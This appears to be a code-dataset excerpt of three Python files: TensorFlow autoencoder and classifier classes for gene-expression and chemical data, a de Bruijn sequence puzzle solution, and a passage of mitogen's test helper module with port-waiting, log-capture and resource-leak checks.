self.is_training = is_training
self.pfx = "rnasigb"
# Building the encoder
def encoder(self, x, keep_prob, weight_decay, reuse=None):
test = not self.is_training
self.width = x.get_shape().as_list()[1]
print("x shape", x.get_shape().as_list())
print("self.width", self.width)
f1_width = 5000
fc1 = linear_layer(x, self.pfx+"_fc1", f1_width, stddev='Xav', wd=weight_decay, \
nonlinearity=tf.nn.sigmoid, reuse=reuse)
f2_width = 2000
fc2 = linear_layer(fc1, self.pfx+'_fc2', f2_width, stddev='Xav', wd=weight_decay, \
nonlinearity=tf.nn.sigmoid, reuse=reuse)
f3_width = 400
fc3 = linear_layer(fc2, self.pfx+'fc3', f3_width, stddev='Xav', wd=weight_decay, \
nonlinearity=tf.nn.sigmoid, reuse=reuse)
self.f4_out_width = 200
fc4_out = linear_layer(fc3, "rnasb_fc4_out", self.f4_out_width, stddev='Xav', \
wd=weight_decay, nonlinearity=None, reuse=reuse)
return fc4_out
# Building the decoder
def decoder(self, x, keep_prob, weight_decay):
test = not self.is_training
f1_width = 400
de_fc1 = linear_layer(x, self.pfx+"_de_fc1", f1_width, stddev='Xav', \
wd=weight_decay, nonlinearity=tf.nn.sigmoid)
f2_width = 2000
de_fc2 = linear_layer(de_fc1, self.pfx+"_de_fc2", f2_width, stddev='Xav', \
wd=weight_decay, nonlinearity=tf.nn.sigmoid)
f3_width = 5000
de_fc3 = linear_layer(de_fc2, self.pfx+"_de_fc3", f3_width, stddev='Xav', \
wd=weight_decay, nonlinearity=tf.nn.sigmoid)
de_fc4_out = linear_layer(de_fc3, self.pfx+'de_fc4_out', self.width, stddev='Xav', \
wd=weight_decay, nonlinearity=None)
print("out layer has width", self.width)
return de_fc4_out
class RNASEQ_SELU_bigger:
def __init__(self, is_training=True):
# self.width is how many features make up the input/output
print("AE for RNASEQ_SELU_bigger")
self.is_training = is_training
# Building the encoder
def encoder(self, x, keep_prob, weight_decay, reuse=None):
test = not self.is_training
self.width = x.get_shape().as_list()[1]
print("x shape", x.get_shape().as_list())
print("self.width", self.width)
fc1 = linear_layer(x, "rnasbr_fc1", 5000, stddev='selu', wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
fc2 = linear_layer(fc1, 'rnasbr_fc2', 2000, stddev='selu', wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
fc3 = linear_layer(fc2, 'rnasbr_fc3', 1000, stddev='selu', wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
fc4 = linear_layer(fc3, 'rnasbr_fc4', 500, stddev='selu', wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
self.f5_out_width = 200
fc5_out = linear_layer(fc4, "rnasbr_fc5_out", self.f5_out_width, stddev='Xav', \
wd=weight_decay, nonlinearity=None, reuse=reuse)
return fc5_out
# Building the decoder
def decoder(self, x, keep_prob, weight_decay):
test = not self.is_training
de_fc1 = linear_layer(x, "rnasbr_de_fc1", 500, stddev='selu', \
wd=weight_decay, nonlinearity=selu)
de_fc2 = linear_layer(de_fc1, "rnasbr_de_fc2", 1000, stddev='selu', \
wd=weight_decay, nonlinearity=selu)
de_fc3 = linear_layer(de_fc2, "rnasbr_de_fc3", 2000, stddev='selu', \
wd=weight_decay, nonlinearity=selu)
de_fc4 = linear_layer(de_fc3, "rnasbr_de_fc4", 5000, stddev='selu', \
wd=weight_decay, nonlinearity=selu)
de_fc5_out = linear_layer(de_fc4, 'rnasbr_de_fc5_out', self.width, stddev='Xav', \
wd=weight_decay, nonlinearity=None)
print("out layer has width", self.width)
return de_fc5_out
class RNASEQ_SELU_sq:
def __init__(self, is_training=True):
# self.width is how many features make up the input/output
print("AE for RNASEQ_SELU_sq")
self.is_training = is_training
# Building the encoder
def encoder(self, x, keep_prob, weight_decay, reuse=None):
test = not self.is_training
self.width = x.get_shape().as_list()[1]
print("x shape", x.get_shape().as_list())
print("self.width", self.width)
f1_width = 1000
fc1 = linear_layer(x, "rnassq_fc1", f1_width, stddev=math.sqrt(1./self.width), wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
f2_width = 1000
fc2 = linear_layer(fc1, 'rnassq_fc2', f2_width, stddev=math.sqrt(1./f1_width), wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
f3_width = 1000
fc3 = linear_layer(fc2, 'rnassq_fc3', f3_width, stddev=math.sqrt(1./f2_width), wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
self.f4_out_width = 200
fc4_out = linear_layer(fc3, "rnassq_fc4_out", self.f4_out_width, stddev='Xav', \
wd=weight_decay, nonlinearity=None, reuse=reuse)
return fc4_out
# Building the decoder
def decoder(self, x, keep_prob, weight_decay):
test = not self.is_training
f1_width = 1000
de_fc1 = linear_layer(x, "rnassq_de_fc1", f1_width, stddev=math.sqrt(1./self.f4_out_width), \
wd=weight_decay, nonlinearity=selu)
f2_width = 1000
de_fc2 = linear_layer(de_fc1, "rnassq_de_fc2", f2_width, stddev=math.sqrt(1./f1_width), \
wd=weight_decay, nonlinearity=selu)
f3_width = 1000
de_fc3 = linear_layer(de_fc2, "rnassq_de_fc3", f3_width, stddev=math.sqrt(1./f2_width), \
wd=weight_decay, nonlinearity=selu)
de_fc4_out = linear_layer(de_fc3, 'rnassq_de_fc4_out', self.width, stddev='Xav', \
wd=weight_decay, nonlinearity=None)
print("out layer has width", self.width)
return de_fc4_out
class RNASEQ_SELU_1k:
def __init__(self, is_training=True):
# self.width is how many features make up the input/output
print("AE for RNASEQ_SELU_sq")
self.is_training = is_training
# Building the encoder
def encoder(self, x, keep_prob, weight_decay, reuse=None):
test = not self.is_training
self.width = x.get_shape().as_list()[1]
print("x shape", x.get_shape().as_list())
print("self.width", self.width)
f1_width = 1000
fc1 = linear_layer(x, "rnas1k_fc1", f1_width, stddev=math.sqrt(1./self.width), wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
f2_width = 1000
fc2 = linear_layer(fc1, 'rnas1k_fc2', f2_width, stddev=math.sqrt(1./f1_width), wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
f3_width = 1000
fc3 = linear_layer(fc2, 'rnas1k_fc3', f3_width, stddev=math.sqrt(1./f2_width), wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
self.f4_out_width = 1000
fc4_out = linear_layer(fc3, "rnas1k_fc4_out", self.f4_out_width, stddev=math.sqrt(1./f3_width), \
wd=weight_decay, nonlinearity=selu, reuse=reuse)
return fc4_out
# Building the decoder
def decoder(self, x, keep_prob, weight_decay):
test = not self.is_training
f1_width = 1000
de_fc1 = linear_layer(x, "rnas1k_de_fc1", f1_width, stddev=math.sqrt(1./self.f4_out_width), \
wd=weight_decay, nonlinearity=selu)
f2_width = 1000
de_fc2 = linear_layer(de_fc1, "rnas1k_de_fc2", f2_width, stddev=math.sqrt(1./f1_width), \
wd=weight_decay, nonlinearity=selu)
f3_width = 1000
de_fc3 = linear_layer(de_fc2, "rnas1k_de_fc3", f3_width, stddev=math.sqrt(1./f2_width), \
wd=weight_decay, nonlinearity=selu)
de_fc4_out = linear_layer(de_fc3, 'rnas1k_de_fc4_out', self.width, stddev=math.sqrt(1./f3_width), \
wd=weight_decay, nonlinearity=None)
print("out layer has width", self.width)
return de_fc4_out
class RNASEQ_SELU:
def __init__(self, is_training=True):
# self.width is how many features make up the input/output
print("AE for RNASEQ_SELU")
self.is_training = is_training
# Building the encoder
def encoder(self, x, keep_prob, weight_decay, reuse=None):
test = not self.is_training
self.width = x.get_shape().as_list()[1]
print("x shape", x.get_shape().as_list())
print("self.width", self.width)
f1_width = 5000
fc1 = linear_layer(x, "rnas_fc1", f1_width, stddev=math.sqrt(1./self.width), wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
f2_width = 1000
fc2 = linear_layer(fc1, 'rnas_fc2', f2_width, stddev=math.sqrt(1./f1_width), wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
self.f3_out_width = 100
fc3_out = linear_layer(fc2, "rnas_fc3_out", self.f3_out_width, stddev=math.sqrt(1./f2_width), \
wd=weight_decay, nonlinearity=selu, reuse=reuse)
return fc3_out
# Building the decoder
def decoder(self, x, keep_prob, weight_decay):
test = not self.is_training
f1_width = 1000
de_fc1 = linear_layer(x, "rnas_de_fc1", f1_width, stddev=math.sqrt(1./self.f3_out_width), \
wd=weight_decay, nonlinearity=selu)
f2_width = 5000
de_fc2 = linear_layer(de_fc1, "rnas_e_fc2", f2_width, stddev=math.sqrt(1./f1_width), \
wd=weight_decay, nonlinearity=selu)
de_fc3_out = linear_layer(de_fc2, 'rnas_e_fc3_out', self.width, stddev=math.sqrt(1./f2_width), \
wd=weight_decay, nonlinearity=None)
print("out layer has width", self.width)
return de_fc3_out
class RNASEQ_sq:
def __init__(self, is_training=True):
# self.width is how many features make up the input/output
print("AE for RNASEQ_sq")
self.is_training = is_training
# Building the encoder
def encoder(self, x, keep_prob, weight_decay, reuse=None):
test = not self.is_training
self.width = x.get_shape().as_list()[1]
print("x shape", x.get_shape().as_list())
print("self.width", self.width)
f1_width = 1000
fc1 = linear_layer(x, "rnasq_fc1", f1_width, stddev='Xav', wd=weight_decay, \
nonlinearity=tf.nn.relu, reuse=reuse)
f2_width = 1000
fc2 = linear_layer(fc1, 'rnasq_fc2', f2_width, stddev='Xav', wd=weight_decay, \
nonlinearity=tf.nn.relu, reuse=reuse)
f3_width = 1000
fc3 = linear_layer(fc2, 'rnasq_fc3', f3_width, stddev='Xav', wd=weight_decay, \
nonlinearity=tf.nn.relu, reuse=reuse)
self.f4_out_width = 200
fc4_out = linear_layer(fc3, "rnasq_fc4_out", self.f4_out_width, stddev='Xav', \
wd=weight_decay, nonlinearity=tf.nn.relu, reuse=reuse)
return fc4_out
# Building the decoder
def decoder(self, x, keep_prob, weight_decay):
test = not self.is_training
f1_width = 1000
de_fc1 = linear_layer(x, "rnasq_de_fc1", f1_width, stddev='Xav', \
wd=weight_decay, nonlinearity=tf.nn.relu)
f2_width = 1000
de_fc2 = linear_layer(de_fc1, "rnasq_de_fc2", f2_width, stddev='Xav', \
wd=weight_decay, nonlinearity=tf.nn.relu)
f3_width = 1000
de_fc3 = linear_layer(de_fc2, "rnasq_de_fc3", f3_width, stddev='Xav', \
wd=weight_decay, nonlinearity=tf.nn.relu)
de_fc4_out = linear_layer(de_fc3, 'rnasq_de_fc4_out', self.width, stddev='Xav', \
wd=weight_decay, nonlinearity=None)
print("out layer has width", self.width)
return de_fc4_out
class LBEXP_SELU:
def __init__(self, is_training=True):
# self.width is how many features make up the input/output
print("AE for LBEXP_selu")
self.is_training = is_training
self.code = 'lbexpselu'
# Building the encoder
def encoder(self, x, keep_prob, weight_decay, reuse=None):
test = not self.is_training
self.width = x.get_shape().as_list()[1]
print("x shape", x.get_shape().as_list())
print("self.width", self.width)
fc1 = linear_layer(tf.nn.dropout(x, keep_prob), self.code+"_fc1", 200, stddev='selu', wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
fc2 = linear_layer(tf.nn.dropout(fc1, keep_prob), self.code+'_fc2', 150, stddev='selu', wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
self.f3_out_width = 100
fc3_out = linear_layer(tf.nn.dropout(fc2, keep_prob), self.code+"_fc3_out", self.f3_out_width, stddev='Xav', \
wd=weight_decay, nonlinearity=None, reuse=reuse)
return fc3_out
# Building the decoder
def decoder(self, x, keep_prob, weight_decay):
test = not self.is_training
de_fc1 = linear_layer(x, self.code+"_de_fc1", 150, stddev='selu', \
wd=weight_decay, nonlinearity=selu)
de_fc2 = linear_layer(de_fc1, self.code+"_de_fc2", 200, stddev='selu', \
wd=weight_decay, nonlinearity=selu)
de_fc3_out = linear_layer(de_fc2, self.code+'_de_fc3_out', self.width, stddev='Xav', \
wd=weight_decay, nonlinearity=None)
print("out layer has width", self.width)
return de_fc3_out
class LBEXP_RELU:
def __init__(self, is_training=True):
# self.width is how many features make up the input/output
print("AE for LBEXP_relu")
self.is_training = is_training
self.code = 'lbexprelu'
# Building the encoder
def encoder(self, x, keep_prob, weight_decay, reuse=None):
test = not self.is_training
self.width = x.get_shape().as_list()[1]
print("x shape", x.get_shape().as_list())
print("self.width", self.width)
fc1 = linear_layer(tf.nn.dropout(x, keep_prob), self.code+"_fc1", 200, stddev='Xav', wd=weight_decay, \
nonlinearity=None, reuse=reuse)
fc2 = linear_layer(tf.nn.dropout(fc1, keep_prob), self.code+'_fc2', 150, stddev='Xav', wd=weight_decay, \
nonlinearity=None, reuse=reuse)
self.f3_out_width = 100
fc3_out = linear_layer(tf.nn.dropout(fc2, keep_prob), self.code+"_fc3_out", self.f3_out_width, stddev='Xav', \
wd=weight_decay, nonlinearity=None, reuse=reuse)
return fc3_out
class AutoEncoder_ECFP_Three_BN:
def __init__(self, numFeatures, is_training=True):
# self.width is how many features make up the input/output
print("AE for ECFP_three_BN")
self.width = numFeatures
self.is_training = is_training
# Building the encoder
def encoder(self, x, keep_prob, weight_decay):
test = not self.is_training
fc1 = batch_normalized_linear_layer(x, "fc1", 500, stddev=.01, wd=weight_decay, test=test)
fc2 = batch_normalized_linear_layer(fc1, 'fc2', 250, stddev=.01, wd=weight_decay, test=test)
fc3_out = linear_layer(fc2, "fc3_out", 100, stddev=.01, wd=weight_decay)
return fc3_out
# Building the decoder
def decoder(self, x, keep_prob, weight_decay):
test = not self.is_training
de_fc1 = batch_normalized_linear_layer(x, "de_fc1", 250, stddev=.01, wd=weight_decay, test=test)
de_fc2 = batch_normalized_linear_layer(de_fc1, "de_fc2", 500, stddev=.01, wd=weight_decay, test=test)
de_fc3_out = linear_layer(de_fc2, 'de_fc3_out', self.width, stddev=.01, \
wd=weight_decay, nonlinearity=intense_sigmoid)
return de_fc3_out
class AutoEncoder_ECFP_Skinny_BN:
def __init__(self, numFeatures, is_training=True):
# self.width is how many features make up the input/output
print("AE for ECFP_three_skinny_BN")
self.width = numFeatures
self.is_training = is_training
# Building the encoder
def encoder(self, x, keep_prob, weight_decay):
test = not self.is_training
fc1 = batch_normalized_linear_layer(x, "fc1", 100, stddev=.01, wd=weight_decay, test=test)
#fc2 = batch_normalized_linear_layer(fc1, 'fc2', 100, stddev=.01, wd=weight_decay, test=test)
fc3_out = linear_layer(fc1, "fc3_out", 100, stddev=.01, wd=weight_decay)
return fc3_out
# Building the decoder
def decoder(self, x, keep_prob, weight_decay):
test = not self.is_training
de_fc1 = batch_normalized_linear_layer(x, "de_fc1", 100, stddev=.01, wd=weight_decay, test=test)
#de_fc2 = batch_normalized_linear_layer(de_fc1, "de_fc2", 100, stddev=.01, wd=weight_decay, test=test)
de_fc3_out = linear_layer(de_fc1, 'de_fc3_out', self.width, stddev=.01, \
wd=weight_decay, nonlinearity=intense_sigmoid)
return de_fc3_out
class FANG_RELU_DRAGON:
def __init__(self):
print("classifier for fang_relu_dragon")
self.code = 'fang_relu_dragon'
# Building the encoder
def encoder(self, x, keep_prob, weight_decay, reuse=None):
self.width = x.get_shape().as_list()[1]
print("x shape", x.get_shape().as_list())
print("self.width", self.width)
fc1 = linear_layer(tf.nn.dropout(x, keep_prob), self.code+"_fc1", 1000, stddev='Xav', wd=weight_decay, \
nonlinearity=tf.nn.relu, reuse=reuse)
fc2 = linear_layer(tf.nn.dropout(fc1, keep_prob), self.code+'_fc2', 1000, stddev='Xav', wd=weight_decay, \
nonlinearity=tf.nn.relu, reuse=reuse)
fc3 = linear_layer(tf.nn.dropout(fc2, keep_prob), self.code+'_fc3', 1000, stddev='Xav', wd=weight_decay, \
nonlinearity=tf.nn.relu, reuse=reuse)
return fc3
class FANG_RELU_GENE:
def __init__(self):
print("classifier for fang_relu_gene")
self.code = 'fang_relu_gene'
# Building the encoder
def encoder(self, x, keep_prob, weight_decay, reuse=None):
self.width = x.get_shape().as_list()[1]
print("x shape", x.get_shape().as_list())
print("self.width", self.width)
fc1 = linear_layer(tf.nn.dropout(x, keep_prob), self.code+"_fc1", 1000, stddev='Xav', wd=weight_decay, \
nonlinearity=tf.nn.relu, reuse=reuse)
fc2 = linear_layer(tf.nn.dropout(fc1, keep_prob), self.code+'_fc2', 1000, stddev='Xav', wd=weight_decay, \
nonlinearity=tf.nn.relu, reuse=reuse)
fc3 = linear_layer(tf.nn.dropout(fc2, keep_prob), self.code+'_fc3', 1000, stddev='Xav', wd=weight_decay, \
nonlinearity=tf.nn.relu, reuse=reuse)
return fc3
class TOX_RELU:
def __init__(self, is_training=True):
# self.width is how many features make up the input/output
print("classifier for tox_relu")
self.is_training = is_training
self.code = 'toxrelu'
# Building the encoder
def encoder(self, x, keep_prob, weight_decay, reuse=None):
test = not self.is_training
self.width = x.get_shape().as_list()[1]
print("x shape", x.get_shape().as_list())
print("self.width", self.width)
fc1 = linear_layer(tf.nn.dropout(x, keep_prob), self.code+"_fc1", 50, stddev='Xav', wd=weight_decay, \
nonlinearity=tf.nn.relu, reuse=reuse)
#fc2 = linear_layer(tf.nn.dropout(fc1, keep_prob), self.code+'_fc2', 50, stddev='Xav', wd=weight_decay, \
# nonlinearity=tf.nn.relu, reuse=reuse)
#fc3 = linear_layer(tf.nn.dropout(fc2, keep_prob), self.code+'_fc3', 25, stddev='Xav', wd=weight_decay, \
# nonlinearity=tf.nn.relu, reuse=reuse)
self.f4_out_width = 10
fc4_out = linear_layer(tf.nn.dropout(fc1, keep_prob), self.code+"_fc4_out", self.f4_out_width, stddev='Xav', \
wd=weight_decay, nonlinearity=tf.nn.relu, reuse=reuse)
return fc4_out
class TOX_RELU_REG:
def __init__(self, is_training=True):
# self.width is how many features make up the input/output
print("classifier for tox_relu_reg")
self.is_training = is_training
self.code = 'toxrelu_reg'
# Building the encoder
def encoder(self, x, keep_prob, weight_decay, reuse=None):
test = not self.is_training
self.width = x.get_shape().as_list()[1]
print("x shape", x.get_shape().as_list())
print("self.width", self.width)
#fc1 = linear_layer(tf.nn.dropout(x, keep_prob), self.code+"_fc1", 50, stddev='Xav', wd=weight_decay, \
# nonlinearity=tf.nn.relu, reuse=reuse)
#fc2 = linear_layer(tf.nn.dropout(fc1, keep_prob), self.code+'_fc2', 50, stddev='Xav', wd=weight_decay, \
# nonlinearity=tf.nn.relu, reuse=reuse)
#fc3 = linear_layer(tf.nn.dropout(fc2, keep_prob), self.code+'_fc3', 25, stddev='Xav', wd=weight_decay, \
# nonlinearity=tf.nn.relu, reuse=reuse)
#fc4 = linear_layer(tf.nn.dropout(fc3, keep_prob), self.code+"_fc4", 20, stddev='Xav', \
# wd=weight_decay, nonlinearity=tf.nn.relu, reuse=reuse)
regressionLayer = linear_layer(x, self.code+"_reg_layer", 1, stddev='Xav', wd=weight_decay, \
nonlinearity=tf.nn.relu, reuse=reuse)
return regressionLayer
class RNASEQ_SELU_big:
def __init__(self, is_training=True):
# self.width is how many features make up the input/output
print("AE for RNASEQ_SELU_big")
self.is_training = is_training
# Building the encoder
def encoder(self, x, keep_prob, weight_decay, reuse=None):
test = not self.is_training
self.width = x.get_shape().as_list()[1]
print("x shape", x.get_shape().as_list())
print("self.width", self.width)
fc1 = linear_layer(x, "rnasb_fc1", 5000, stddev='selu', wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
fc2 = linear_layer(fc1, 'rnasb_fc2', 2000, stddev='selu', wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
fc3 = linear_layer(fc2, 'rnasb_fc3', 400, stddev='selu', wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
fc4_out = linear_layer(fc3, "rnasb_fc4_out", 200, stddev='Xav', \
wd=weight_decay, nonlinearity=None, reuse=reuse)
return fc4_out
# Building the decoder
def decoder(self, x, keep_prob, weight_decay):
test = not self.is_training
de_fc1 = linear_layer(x, "rnasb_de_fc1", 400, stddev='selu', \
wd=weight_decay, nonlinearity=selu)
de_fc2 = linear_layer(de_fc1, "rnasb_de_fc2", 2000, stddev='selu', \
wd=weight_decay, nonlinearity=selu)
de_fc3 = linear_layer(de_fc2, "rnasb_de_fc3", 5000, stddev='selu', \
wd=weight_decay, nonlinearity=selu)
de_fc4_out = linear_layer(de_fc3, 'rnasb_de_fc4_out', self.width, stddev='Xav', \
wd=weight_decay, nonlinearity=None)
print("out layer has width", self.width)
return de_fc4_out
| 40.259197 | 118 | 0.61055 |
ace8f066d478199175b053c11dc3b113064c56c1 | 1,024 | py | Python | solutions/problem_264.py | ksvr444/daily-coding-problem | 5d9f488f81c616847ee4e9e48974523ec2d598d7 | [
"MIT"
] | 1,921 | 2018-11-13T18:19:56.000Z | 2021-11-15T14:25:41.000Z | solutions/problem_264.py | MohitIndian/daily-coding-problem | 5d9f488f81c616847ee4e9e48974523ec2d598d7 | [
"MIT"
] | 2 | 2019-07-19T01:06:16.000Z | 2019-08-01T22:21:36.000Z | solutions/problem_264.py | MohitIndian/daily-coding-problem | 5d9f488f81c616847ee4e9e48974523ec2d598d7 | [
"MIT"
] | 1,066 | 2018-11-19T19:06:55.000Z | 2021-11-13T12:33:56.000Z | # NOTE: The answer in the problem description is incorrect since
# it doesn't include '100' or '110'
def generate_combos(chars, k, context=""):
if not k:
return set([context])
combos = set()
for ch in chars:
combos |= generate_combos(chars, k-1, context + ch)
return combos
def get_debruijn_seq(chars, combos, context=""):
if not combos:
return set([context])
dseqs = set()
if not context:
for cb in combos:
child_dseqs = get_debruijn_seq(
chars, combos - set([cb]), cb)
dseqs |= child_dseqs
return dseqs
for ch in chars:
new_cb = context[-2:] + ch
if new_cb in combos:
child_dseqs = get_debruijn_seq(
chars, combos - set([new_cb]), context + ch)
dseqs |= child_dseqs
return dseqs
# Tests
c, k = {'0', '1'}, 3
combos = generate_combos(c, k)
dseqs = get_debruijn_seq(c, combos)
assert all([all([cb in ds for cb in combos]) for ds in dseqs])
| 23.272727 | 64 | 0.583984 |
ace8f0a27d696b81a213808f084e3d9be361deda | 15,939 | py | Python | tests/testlib.py | webcoast-dk/mitogen | a5fe4a9fac5561511b676fe61ed127b732be5b12 | [
"BSD-3-Clause"
] | null | null | null | tests/testlib.py | webcoast-dk/mitogen | a5fe4a9fac5561511b676fe61ed127b732be5b12 | [
"BSD-3-Clause"
] | 3 | 2021-03-26T00:43:30.000Z | 2022-03-29T22:03:58.000Z | tests/testlib.py | webcoast-dk/mitogen | a5fe4a9fac5561511b676fe61ed127b732be5b12 | [
"BSD-3-Clause"
] | null | null | null |
import logging
import os
import random
import re
import signal
import socket
import subprocess
import sys
import threading
import time
import traceback
import unittest2
import mitogen.core
import mitogen.fork
import mitogen.master
import mitogen.utils
try:
import faulthandler
except ImportError:
faulthandler = None
try:
import urlparse
except ImportError:
import urllib.parse as urlparse
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
try:
BaseException
except NameError:
BaseException = Exception
LOG = logging.getLogger(__name__)
DATA_DIR = os.path.join(os.path.dirname(__file__), 'data')
MODS_DIR = os.path.join(DATA_DIR, 'importer')
sys.path.append(DATA_DIR)
sys.path.append(MODS_DIR)
if mitogen.is_master:
mitogen.utils.log_to_file()
if faulthandler is not None:
faulthandler.enable()
#
# Temporary hack: Operon changed logging somewhat, and this broke LogCapturer /
# log_handler_test.
#
mitogen.core.LOG.propagate = True
def get_fd_count():
"""
Return the number of FDs open by this process.
"""
import psutil
return psutil.Process().num_fds()
def data_path(suffix):
path = os.path.join(DATA_DIR, suffix)
if path.endswith('.key'):
# SSH is funny about private key permissions.
os.chmod(path, int('0600', 8))
return path
def subprocess__check_output(*popenargs, **kwargs):
# Missing from 2.6.
process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
output, _ = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
raise subprocess.CalledProcessError(retcode, cmd)
return output
def Popen__terminate(proc):
os.kill(proc.pid, signal.SIGTERM)
if hasattr(subprocess, 'check_output'):
subprocess__check_output = subprocess.check_output
if hasattr(subprocess.Popen, 'terminate'):
Popen__terminate = subprocess.Popen.terminate
def wait_for_port(
host,
port,
pattern=None,
connect_timeout=0.5,
receive_timeout=0.5,
overall_timeout=5.0,
sleep=0.1,
):
"""Attempt to connect to host/port, for upto overall_timeout seconds.
If a regex pattern is supplied try to find it in the initial data.
Return None on success, or raise on error.
"""
start = mitogen.core.now()
end = start + overall_timeout
addr = (host, port)
while mitogen.core.now() < end:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(connect_timeout)
try:
sock.connect(addr)
except socket.error:
# Failed to connect. So wait then retry.
time.sleep(sleep)
continue
if not pattern:
# Success: We connected & there's no banner check to perform.
sock.shutdown(socket.SHUTD_RDWR)
sock.close()
return
sock.settimeout(receive_timeout)
data = mitogen.core.b('')
found = False
while mitogen.core.now() < end:
try:
resp = sock.recv(1024)
except socket.timeout:
# Server stayed up, but had no data. Retry the recv().
continue
if not resp:
# Server went away. Wait then retry the connection.
time.sleep(sleep)
break
data += resp
if re.search(mitogen.core.b(pattern), data):
found = True
break
try:
sock.shutdown(socket.SHUT_RDWR)
except socket.error:
e = sys.exc_info()[1]
# On Mac OS X - a BSD variant - the above code only succeeds if the
# operating system thinks that the socket is still open when
# shutdown() is invoked. If Python is too slow and the FIN packet
# arrives before that statement can be reached, then OS X kills the
# sock.shutdown() statement with:
#
# socket.error: [Errno 57] Socket is not connected
#
# Protect shutdown() with a try...except that catches the
# socket.error, test to make sure Errno is right, and ignore it if
# Errno matches.
if e.errno == 57:
pass
else:
raise
sock.close()
if found:
# Success: We received the banner & found the desired pattern
return
else:
# Failure: The overall timeout expired
if pattern:
raise socket.timeout('Timed out while searching for %r from %s:%s'
% (pattern, host, port))
else:
raise socket.timeout('Timed out while connecting to %s:%s'
% (host, port))
def sync_with_broker(broker, timeout=10.0):
"""
Insert a synchronization barrier between the calling thread and the Broker
thread, ensuring it has completed at least one full IO loop before
returning.
Used to block while asynchronous stuff (like defer()) happens on the
broker.
"""
sem = mitogen.core.Latch()
broker.defer(sem.put, None)
sem.get(timeout=timeout)
def log_fd_calls():
mypid = os.getpid()
l = threading.Lock()
real_pipe = os.pipe
def pipe():
l.acquire()
try:
rv = real_pipe()
if mypid == os.getpid():
sys.stdout.write('\n%s\n' % (rv,))
traceback.print_stack(limit=3)
sys.stdout.write('\n')
return rv
finally:
l.release()
os.pipe = pipe
real_socketpair = socket.socketpair
def socketpair(*args):
l.acquire()
try:
rv = real_socketpair(*args)
if mypid == os.getpid():
sys.stdout.write('\n%s -> %s\n' % (args, rv))
traceback.print_stack(limit=3)
sys.stdout.write('\n')
return rv
finally:
l.release()
socket.socketpair = socketpair
real_dup2 = os.dup2
def dup2(*args):
l.acquire()
try:
real_dup2(*args)
if mypid == os.getpid():
sys.stdout.write('\n%s\n' % (args,))
traceback.print_stack(limit=3)
sys.stdout.write('\n')
finally:
l.release()
os.dup2 = dup2
real_dup = os.dup
def dup(*args):
l.acquire()
try:
rv = real_dup(*args)
if mypid == os.getpid():
sys.stdout.write('\n%s -> %s\n' % (args, rv))
traceback.print_stack(limit=3)
sys.stdout.write('\n')
return rv
finally:
l.release()
os.dup = dup
class CaptureStreamHandler(logging.StreamHandler):
def __init__(self, *args, **kwargs):
logging.StreamHandler.__init__(self, *args, **kwargs)
self.msgs = []
def emit(self, msg):
self.msgs.append(msg)
logging.StreamHandler.emit(self, msg)
class LogCapturer(object):
def __init__(self, name=None):
self.sio = StringIO()
self.logger = logging.getLogger(name)
self.handler = CaptureStreamHandler(self.sio)
self.old_propagate = self.logger.propagate
self.old_handlers = self.logger.handlers
self.old_level = self.logger.level
def start(self):
self.logger.handlers = [self.handler]
self.logger.propagate = False
self.logger.level = logging.DEBUG
def raw(self):
s = self.sio.getvalue()
# Python 2.x logging package hard-wires UTF-8 output.
if isinstance(s, mitogen.core.BytesType):
s = s.decode('utf-8')
return s
def msgs(self):
return self.handler.msgs
def __enter__(self):
self.start()
return self
def __exit__(self, _1, _2, _3):
self.stop()
def stop(self):
self.logger.level = self.old_level
self.logger.handlers = self.old_handlers
self.logger.propagate = self.old_propagate
return self.raw()
class TestCase(unittest2.TestCase):
@classmethod
def setUpClass(cls):
# This is done in setUpClass() so we have a chance to run before any
# Broker() instantiations in setUp() etc.
mitogen.fork.on_fork()
cls._fd_count_before = get_fd_count()
super(TestCase, cls).setUpClass()
ALLOWED_THREADS = set([
'MainThread',
'mitogen.master.join_thread_async'
])
def _teardown_check_threads(self):
counts = {}
for thread in threading.enumerate():
name = thread.getName()
# Python 2.4: enumerate() may return stopped threads.
assert (not thread.isAlive()) or name in self.ALLOWED_THREADS, \
'Found thread %r still running after tests.' % (name,)
counts[name] = counts.get(name, 0) + 1
for name in counts:
assert counts[name] == 1, \
'Found %d copies of thread %r running after tests.' % (
counts[name], name
)
def _teardown_check_fds(self):
mitogen.core.Latch._on_fork()
if get_fd_count() != self._fd_count_before:
import os; os.system('lsof +E -w -p %s | grep -vw mem' % (os.getpid(),))
assert 0, "%s leaked FDs. Count before: %s, after: %s" % (
self, self._fd_count_before, get_fd_count(),
)
# Some class fixtures (like Ansible MuxProcess) start persistent children
# for the duration of the class.
no_zombie_check = False
def _teardown_check_zombies(self):
if self.no_zombie_check:
return
try:
pid, status = os.waitpid(0, os.WNOHANG)
except OSError:
return # ECHILD
if pid:
assert 0, "%s failed to reap subprocess %d (status %d)." % (
self, pid, status
)
print('')
print('Children of unit test process:')
os.system('ps uww --ppid ' + str(os.getpid()))
assert 0, "%s leaked still-running subprocesses." % (self,)
def tearDown(self):
self._teardown_check_zombies()
self._teardown_check_threads()
self._teardown_check_fds()
super(TestCase, self).tearDown()
def assertRaises(self, exc, func, *args, **kwargs):
"""Like regular assertRaises, except return the exception that was
raised. Can't use context manager because tests must run on Python2.4"""
try:
func(*args, **kwargs)
except exc:
e = sys.exc_info()[1]
return e
except BaseException:
LOG.exception('Original exception')
e = sys.exc_info()[1]
